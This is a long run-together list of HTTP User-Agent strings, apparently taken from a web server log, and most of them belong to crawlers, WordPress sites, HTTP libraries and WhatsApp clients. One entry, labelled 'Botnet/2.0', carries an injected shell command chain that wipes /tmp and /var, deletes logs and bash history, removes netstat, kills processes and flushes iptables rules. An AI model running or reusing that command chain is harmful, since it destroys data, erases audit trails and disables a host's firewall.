http://disckahealvie.unblog.fr +WordPress/3.7.5; http://satnordchigab.unblog.fr +Google account +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.2.0.1125 (SpeedMode; Proxy; Android 5.0.2; SM-N910H ) U2/1.0.0 Mobile +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.0.1016 (SpeedMode; Proxy; Android 9; HTC_Desire_601_dual_sim ) U2/1.0.0 Mobile +WordPress/5.2.9; https://superworldvitamin.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611573562-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611552934-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611552942-0 +Java/11.0.9.1 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611588396-0 +python-requests/2.7.0 CPython/3.6.12 Linux/4.4.0-1083-aws +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611603234-0 +WordPress/5.6; https://sdelaicomp.ru +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 PTST/210122.160116 +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Mediapartners-Google) Chrome/88.0.4324.114 Mobile Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611643012-0 +Mozilla/5.0 (compatible; heritrix/3.4.0-SNAPSHOT-2019-05-22T20:43:22Z +http://www.nationallibrary.fi) +Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_1) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.115 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611630501-10 +Mozilla/5.0 (compatible; WbSrch/1.1 +https://wbsrch.com) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611678813-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611678843-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611678955-10 +WhatsApp/2.2100.11 N +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 OPR/73.0.3856.284 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611631343-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611631338-0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) adbeat.com/policy AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Safari/605.1.15 +WhatsApp/2.21.3.1 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611665431-0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 PTST/210125.170107 +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/88.0.4324.114 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve-gq1/1611665985-60 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611711196-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611735735-0 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +My Nutch Spider/Nutch-1.17 (my http.agent.description; 3721771@qq.com) +WordPress/5.5.3; https://192.168.100.13/non-beta/aurachain/academy +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611711923-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611778956-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611778975-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611781243-10 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.118 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +WhatsApp/2.21.2.14 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1611707703-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1611713250-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611717649-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611718363-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611725893-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611725889-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611734104-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611734120-0 +PycURL/7.43.0.6 libcurl/7.64.0 OpenSSL/1.1.1d zlib/1.2.11 libidn2/2.0.5 libpsl/0.20.2 (+libidn2/2.0.5) libssh2/1.8.0 nghttp2/1.36.0 librtmp/2.3 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611751764-0 +WhatsApp/2.21.3.3 A +FDM/6.13.3.3568 +Mozilla/5.0 (compatible; YandexMarket/2.0; +http://yandex.com/bots) +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.140 Safari/537.36 (compatible; Google-Shopping-Quality http://www.google.com/merchants/tos/extend/DE/tos.html) +python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.2.1.el6.x86_64 +ImplisenseBot 1.1 +PycURL/7.43.0.2 libcurl/7.61.0 OpenSSL/1.1.0h zlib/1.2.11 libidn2/2.0.5 libpsl/0.20.2 ( libidn2/2.0.4) nghttp2/1.32.0 +python-requests/2.6.0 CPython/2.7.5 Linux/4.4.127-mainline-rev1 +PycURL/7.43.0.2 libcurl/7.35.0 OpenSSL/1.0.1f zlib/1.2.8 libidn/1.28 librtmp/2.3 +check_http/v1.4.14 (nagios-plugins 1.4.14) +python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-862.3.2.el7.x86_64 +check_http/v2.0.3 (nagios-plugins 2.0.3) +WinHttpRequest +Botnet/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/ip +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1540185978-0 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) kafe/1540185979-0 +curl/7.22.0 (x86_64-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.8 libidn/1.23 librtmp/2.3 +RadiosNet/2.6.1 (Java; Android) +python-requests/2.2.1 CPython/2.7.6 Linux/3.13.0-162-generic +python-requests/2.4.3 CPython/2.7.9 Linux/3.16.0-7-amd64 +RadiosNet/2.6.0 (Java; Android) +python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-693.el7.x86_64 +python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.9.1.el6.x86_64 +python-requests/2.2.1 CPython/2.7.6 Linux/3.13.0-164-generic +python-requests/2.4.3 CPython/2.7.9 Linux/3.16.0-6-amd64 +python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-693.11.1.el7.x86_64 +libwww-perl/6.37 +python-requests/1.1.0 CPython/2.7.5 Linux/3.10.0-121.el7.x86_64 +python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-042stab127.2 +python-requests/2.4.3 CPython/3.4.2 Linux/2.6.32-042stab120.19 +python-requests/2.7.0 CPython/2.7.15 Windows/2012ServerR2 +python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-696.1.1.el6.x86_64 +python-requests/2.7.0 CPython/2.7.16 Windows/2008ServerR2 +python-requests/2.6.0 CPython/2.7.5 Linux/2.6.32-042stab127.2 +python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-042stab142.1 +WordPress/5.6; https://wpscout.io +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1611793994-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1611799771-10 +python-requests/2.2.1 CPython/2.7.6 Linux/4.4.0-31-generic +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611823449-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611823444-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611873234-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611873237-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1611794839-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1611800525-0 +WordPress/5.6; https://irrin.web.id +revolt +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611869919-0 +HTTP_Request2/2.4.1 (http://pear.php.net/package/http_request2) PHP/5.6.33 +curl/7.54.1 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve-gq1/1611822201-60 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611819952-0 +Jigsaw/2.3.0 W3C_CSS_Validator_JFouffa/2.0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611819950-0 +Apache-HttpClient/4.5.3 (Java/1.8.0_241) +Java/1.8.0_271 +XSpiderA +curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 OpenSSL/1.0.2f zlib/1.2.3 libidn/1.18 libssh2/1.4.2 +python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1160.11.1.el7.x86_64 +WordPress/4.8.15; http://www.fit-4-live.com/wordpress +PayPal IPN ( https://www.paypal.com/ipn ) +curl/7.48.0 +SentiBot www.sentibot.eu (compatible with Googlebot) +WordPress/5.4.4; https://www.nekoesports.de +WordPress/5.4.4; http://www.nekoesports.de +WordPress/4.9.3; http://klever-jazzfreunde.net +WordPress/4.6.20; http://willnick.de +NokiaC2-05/2.0 (08.60) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 (Java; U; kau; nokiac2-05) UCBrowser8.3.0.154/69/405/UCWEB Mobile UNTRUSTED/1.0 +GuzzleHttp/6.5.5 curl/7.29.0 PHP/7.1.12 +WordPress/4.7.19; https://eureschule.de +WordPress/4.7.19; https://eureschule.de/nl +Apache-HttpClient/4.5.12 (Java/1.8.0_232) +Hatena Antenna/0.5 (http://a.hatena.ne.jp/help) +FeedBlitz/1.0 (1 subscribers) +crawler_eb_germany_2.0 +WordPress/2.8; http://www.antebis.com/it-sicherheit +WordPress/2.8; http://www.antebis.com/RBC +WordPress/2.8; http://www.antebis.com/verbraucher +Feedly/1.0 ( http://www.feedly.com/fetcher.html; 1 subscribers; like FeedFetcher-Google) +PHP/6.3.63 +PHP/5.3.18 +Java/1.8.0_281 +python-requests/2.25.1 fb6 +Googlebot/2.1 ( http://www.googlebawt.com/bot.html) +yacybot (/global; amd64 Linux 4.18.10-gentoo; java 1.8.0_171; Europe/de) http://yacy.net/bot.html +fasthttp, Mozilla/5.0 (Macin tosh; Intel Mac OS X 10.10; rv:52.0) Gecko/20100101 Firefox/52.0 +Crawler powered by contentDetection (www.mindup.de) +check_http/v1.4.15-61-g4d527 (nagios-plugins 1.4.15) +python-requests/2.2.1 CPython/2.7.6 Linux/3.13.0-165-generic +python-requests/2.2.1 CPython/2.7.6 Linux/3.13.0-042stab136.1 +LWP::Simple/5.827 libwww-perl/5.831 +Windows-RSS-Platform/1.0 (MSIE 7.0; Windows NT 5.1) +python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.18.2.el6.x86_64 + +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; http://www.google.com/bot.html) Chrome/21.3.4.0 Safari/537.36 +curl/7.4 +Java/13.0.2 +Apache-HttpClient/4.5.12 (Java/13.0.2) +GuzzleHttp/6.5.4 PHP/7.4.6 +Apache-HttpClient/4.5.12 (Java/14.0.1) +WordPress/4.9.15; http://www.ikqafh.co +WhatsApp/2.21.1.13 Android/9 Device/samsung-SM-J530F +WordPress/5.4.4; https://www.jho-immobilien.com +olbicobot/Nutch-1.15-SNAPSHOT (https://support.olbi.co/en/articles/3171226-crawling; webmasters@olbico.nl) +python-requests/2.2.1 CPython/2.7.6 Linux/4.19.0-13-amd64 +Mozilla/5.0 (compatible; MetaJobBot; https://www.metajob.at/crawler) +WordPress.com; http://blog.dehido.xe.cx +PHP/5.2.87 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.3.1128 (SpeedMode; Proxy; Android 4.4.4; HTC_Desire_601_dual_sim ) U2/1.0.0 Mobile +Bumble Bee/1.0 (WikiApiary; http://wikiapiary.com/wiki/User:Bumble_Bee) +Mozilla/5.0 (compatible; houzzbot; http://www.houzz.com/) +curl/7.22.0 (x86_64-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.2j zlib/1.2.3.4 libidn/1.23 librtmp/2.3 +WordPress.com; http://blog.perfektleben.de +WordPress/5.6; https://meinnrw.de +WordPress/4.1.22; http://www.hochzeitsakademie.de +RadiosNet/2.5.1 (Java; Android) +yacybot (/global; amd64 Linux 4.19.0-13-amd64; java 11.0.9.1; Europe/en) http://yacy.net/bot.html +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611948994-0 +WhatsApp/2.21.1.16 A +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.138 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +python-httpx/0.16.1 +WordPress/5.6; https://axaconsulting.ro +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611879611-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611896398-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611896416-10 +WhatsApp/2.21.1.14 A +WhatsApp/2.21.3.6 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1611880365-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611882921-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611882947-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1611885956-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611916369-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611922111-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611922123-0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Teleport/8.1.9 Chrome/80.0.3987.165 Electron/8.5.0 Safari/537.36 Tc-webkit AppEngine-Google; (+http://code.google.com/appengine; appid: s~live-fullspectrum) +WhatsApp/2.21.20.21 i +WhatsApp/2.2102.7 N +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.140 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 PTST/210128.162206 +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/88.0.4324.114 Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/88.0.4324.114 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve-gq1/1611915519-60 +WhatsApp/2.21.3.2 A +NetSurf/3.11 (Plan9) +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612044339-0 +WhatsApp/2.21.3.8 A +WhatsApp/2.2102.8 N +Mozilla/5.0 (compatible; imrbot/1.10.8 +http://www.mignify.com) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611976792-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611976789-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1611982102-0 +WordPress/5.6; https://www.tecmaza.com +WordPress/5.6; https://www.kanaktec.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612032400-0 +WordPress/5.6; https://www.tecplac.com +WordPress/5.6; https://www.tecdud.com +WhatsApp/2.21.3.7 A +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.142 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612038139-0 +webcollage.original/1.176 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612038139-60 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612038138-0 +WordPress/3.7.5; http://raifrivisma.unblog.fr +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612038140-10 +WordPress/5.3.4; https://caseformobile.ru +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.7.8.806 (SpeedMode; Proxy; Android 6.0.1; SM-G532F ) U2/1.0.0 Mobile +Apache-HttpClient/4.5.12 (Java/1.8.0_212) +Java/1.5.0_15 +WordPress/5.6; https://adamnaamani.com +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) adbeat.com/policy Gecko/20100101 Firefox/85.0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612114396-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1612053323-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1612057554-0 +yacybot (freeworld/global; i386 Linux 3.10-2-686-pae; java 1.7.0_21; Europe/fr) http://yacy.net/bot.html +WordPress/5.3.4; https://chigap.ru +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve-gq1/1612115887-0 +WordPress/5.6; https://zhazhda.site/info +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36 Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 PTST/210201.212504 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.143 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (compatible; theoldreader.com; 4 subscribers; feed-id=d1ed129e605fa903151903ce) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612153349-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612153352-0 +GuzzleHttp/6.5.1 curl/7.58.0 PHP/7.4.14 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.144 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 PTST/210201.211621 +axios/1.5.109 +AvsDeviceSdk/1.10.0 +WordPress/5.5.3; https://www.apisero.com +WordPress/5.2.9; http://vh432492.eurodir.ru +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612290076-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1612290063-10 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) adbeat.com/policy AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 +WhatsApp/2.21.3.9 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) 